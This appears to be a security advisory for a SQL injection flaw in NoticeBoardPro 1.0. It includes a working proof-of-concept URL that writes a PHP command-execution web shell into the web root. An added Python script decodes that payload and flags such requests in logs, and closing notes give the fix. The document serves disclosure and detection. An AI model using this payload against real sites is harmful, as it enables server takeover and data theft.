A SQL injection vulnerability in NoticeBoardPro version 1.0 can be exploited to extract arbitrary data. In some environments it may be possible to create a PHP shell.
# ------------------------------------------------------------------------
# Software................NoticeBoardPro 1.0
# Vulnerability...........SQL Injection
# Threat Level............Critical (4/5)
# Download................http://www.NoticeBoardPro.com/
# Discovery Date..........5/11/2011
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................AutoSec Tools
# Site....................http://www.autosectools.com/
# Email...................John Leitch <john@autosectools.com>
# ------------------------------------------------------------------------
#
#
# --Description--
#
# A SQL injection vulnerability in NoticeBoardPro 1.0 (the userID
# parameter of deleteItem3.php, as shown in the PoC below) can be
# exploited to extract arbitrary data via UNION SELECT. In some
# environments it may also be possible to create a PHP shell: the PoC
# appends INTO OUTFILE to write a file into the web root. That second
# step only works when the database account holds the MySQL FILE
# privilege, secure_file_priv does not restrict the target directory,
# the web root is writable by the MySQL server process, and its path is
# known to the attacker (the PoC assumes the XAMPP layout used for
# testing).
#
#
# --PoC--
http://localhost/noticeboardpro/deleteItem3.php?noticeID=&userID='and%201=0%20UNION%20SELECT%20'%3C?php%20echo%20system($_GET[%22CMD%22]);%20?%3E','','','','','','','','','','',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23
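The following Python script is an added example and not part of the original advisory or of NoticeBoardPro. It URL-decodes the PoC, drops the payload into a hypothetical reconstruction of the vulnerable statement (the advisory does not show the application's source; the table name and SELECT shape are assumptions, though the quote-then-UNION structure of the payload does imply a SELECT with the value inside single quotes), pulls the UNION column literals and the OUTFILE target back out, and flags the same pattern in constructed access-log lines.

```python
"""Added example (not from the advisory): decode the NoticeBoardPro 1.0 PoC,
show where the payload lands in a quoted SQL string, and flag the same
pattern in web-server logs. Names marked ASSUMED are not from the page."""
import re
from urllib.parse import urlsplit, unquote

# Copy of the PoC URL from the advisory.
POC_URL = "http://localhost/noticeboardpro/deleteItem3.php?noticeID=&userID='and%201=0%20UNION%20SELECT%20'%3C?php%20echo%20system($_GET[%22CMD%22]);%20?%3E','','','','','','','','','','',''%20FROM%20dual%20INTO%20OUTFILE%20'../../htdocs/shell.php';%23"


def parse_query(url):
    """Split the query on '&' only. parse_qs on Python < 3.9.2 also splits on
    ';', which would cut this payload at the ';' before the '#' comment."""
    params = {}
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


# ASSUMED reconstruction of the vulnerable statement. A UNION only works
# against a SELECT, and the payload opens with a quote, so the injected value
# must sit inside '...'; the table and column list are made up.
ASSUMED_QUERY = "SELECT * FROM notices WHERE noticeID='{noticeID}' AND userID='{userID}'"


def injected_statement(url, template=ASSUMED_QUERY):
    """Return (full text, text MySQL executes): the payload substituted in,
    then everything after the '#' comment marker discarded, which is how the
    trailing quote from the template is neutralised."""
    full = template.format(**parse_query(url))
    effective = full.split("#", 1)[0]
    return full, effective


def union_columns(statement):
    """Extract the quoted literals of the UNION SELECT: the first carries the
    PHP payload, the rest are padding to match the column count."""
    m = re.search(r"UNION SELECT (.*?) FROM dual", statement, re.S)
    if not m:
        return []
    return re.findall(r"'((?:[^']|'')*)'", m.group(1))


def outfile_target(statement):
    """Path the INTO OUTFILE clause would write to, or None."""
    m = re.search(r"INTO OUTFILE '([^']*)'", statement)
    return m.group(1) if m else None


# Detection side: decode request URLs from combined-format log lines and
# report which injection primitives they contain.
SQLI_PATTERNS = {
    "union-select": re.compile(r"\bUNION\b\s+(?:ALL\s+)?SELECT\b", re.I),
    "into-outfile": re.compile(r"\bINTO\s+(?:OUT|DUMP)FILE\b", re.I),
    "load-file": re.compile(r"\bLOAD_FILE\s*\(", re.I),
}
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_requests(log_lines):
    """Return one record per request whose decoded URL matches a pattern."""
    hits = []
    for line in log_lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        decoded = unquote(unquote(m.group(1)))  # twice: catches %25-double encoding
        reasons = [name for name, rx in SQLI_PATTERNS.items() if rx.search(decoded)]
        if reasons:
            hits.append({"ip": line.split()[0], "url": m.group(1), "reasons": reasons})
    return hits


# Constructed Apache combined-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Nov/2011:10:12:01 +0000] "GET /noticeboardpro/deleteItem3.php?noticeID=12&userID=7 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [05/Nov/2011:10:13:44 +0000] "GET ' + POC_URL[len("http://localhost"):] + ' HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    full, effective = injected_statement(POC_URL)
    print("executed:", effective)
    cols = union_columns(effective)
    print(len(cols), "UNION columns; first column:", cols[0])
    print("OUTFILE target:", outfile_target(effective))
    for hit in suspicious_requests(SAMPLE_LOG):
        print("ALERT", hit["ip"], hit["reasons"])
```

The column padding in the PoC is what makes the UNION legal: MySQL rejects a UNION whose branches differ in column count, so the number of empty literals tells you how many columns the original SELECT returns. The detector decodes twice because a `%2520` encoded payload passes a single-decode filter; the real fix on the application side is a prepared statement with userID bound as a parameter, plus a database account without the FILE privilege.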